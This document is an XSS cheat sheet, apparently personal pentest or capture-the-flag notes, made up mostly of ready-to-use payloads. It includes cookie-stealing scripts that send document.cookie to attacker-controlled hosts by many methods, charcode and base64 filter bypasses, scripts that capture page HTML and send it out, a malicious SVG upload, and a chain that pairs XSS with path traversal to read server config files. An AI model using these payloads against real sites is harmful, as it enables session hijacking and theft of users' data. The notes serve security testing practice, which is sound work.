XSS
Cross-site Scripting
XSS Types
Reflected XSS
XSSpayload is reflected immediately in the response.Non-persistent, requires user interaction.
Stored XSS
XSSpayload is stored on the server and executed when page loads.Persistent, affects all users who view the content.
DOM-Based XSS
Payload executes as a result of modifying the DOM environment.
Detection & Testing
External Resource Testing
Setup HTTP Server:
python3 -m http.server 80Submit Payload:
<img src='http://10.10.14.30/test.jpg' />if you receive a request, external resources are allowed
Basic Code Execution Tests
<script>alert('XSS')</script><img src="x"><script>javascript:alert(1)</script>">fetch('http://10.10.14.91:8000/?cookie=' + document.cookie);Filter Bypasses
Charcode Bypass
Python Script to Generate Charcode:
python3 -c "print(','.join([str(ord(c)) for c in '''document.write('<script src=\"http://10.10.16.8/tokyo.js\"></script>');''']))"Now make the payload:
<img src="x/><script>eval(String.fromCharCode(CHARCODE_HERE));</script>">Base64 Encoding Bypass
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>Cookie Stealing
Key Condition HttpOnly needs to be set to false
Image-Based Cookie Stealing
Use when injecting into an image tag where an error event triggers(
HTTP response error or broken link)
Basic image error trigger
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>Image with redirect
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">Image object via script
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>Variable assignment method
<script>var i=new Image(); i.src="http://10.10.14.6/?c="+document.cookie;</script>Location-Based Cookie Stealing
Basic location redirect
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>Alternative location syntax
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>Document location method
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>Document location method + Redirect
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>Window location method
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>Window location method Dynamically
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>Window location method + Redirect
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>String concatenation methods (dynamically join the URL and cookies to redirect)
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>Location + redirect with concatenation of cookies
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>Advanced Cookie Stealing Methods
Audio object method
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>Document write method
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>XMLHttpRequest method
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>Fetch API method to avoid response handling:
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>SendBeacon API (stealthier)
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>DOM-Stored Cookie Extraction
Extract cookies stored in DOM elements
window.addEventListener('DOMContentLoaded', function(e) {
window.location = "http://10.10.16.8:4444/?tokyo=" + encodeURI(document.getElementsByName("cookie")[0].value)
})Content Extraction
Full HTML Content Capture
var req=new XMLHttpRequest();
req.open('GET', 'http://10.10.16.8:4444/?tokyo=' + btoa(document.body.innerHTML), true);
req.send();Targeted Element Extraction
Extract specific page elements
function getElement() {
var req1=new XMLHttpRequest();
req1.open('GET', '#admin' , true); //Swap #admin for your desired element
req1.onreadystatechange = function () {
if (req1.readyState === req1.DONE) {
if (req1.status === 200) {
var req2=new XMLHttpRequest();
req2.open('GET', 'http://10.10.16.8:4444?tokyo=' + btoa(req1.responseText), true);
req2.send();
}
}
};
req1.send();
}
getElement();Advanced Content Extraction
Safe content extraction with encoding
function safeContentGrab() {
var req = new XMLHttpRequest();
req.open('GET', 'http://example.com', true);
req.onload = function() {
if (req.status === 200) {
var encodedData = btoa(req.responseText);
console.log('Encoded:', encodedData);
var sendReq = new XMLHttpRequest();
sendReq.open('POST', 'http://10.10.16.8:4444/', true);
sendReq.send('tokyo=' + encodedData);
}
};
req.send();
}
function cookieExample() {
document.cookie = "testCookie=exampleValue; SameSite=Lax";
var allCookies = document.cookie;
console.log('All cookies:', allCookies);
}
safeContentGrab();
cookieExample();Stored XSS via SVG Upload
Create a malicious SVG file to test image uploading features:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("Hello World");
</script>
</svg>XSS + Arbitrary File Upload
First, create the file that you are going to use to load the malicious javascript:
Load the file
<script src="http://REMOTE-SERVER:PORT/tokyo.js"></script>Then, create the script:
var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.5:3000/?content=' + btoa(req.responseText),
true);
req2.send();Last updated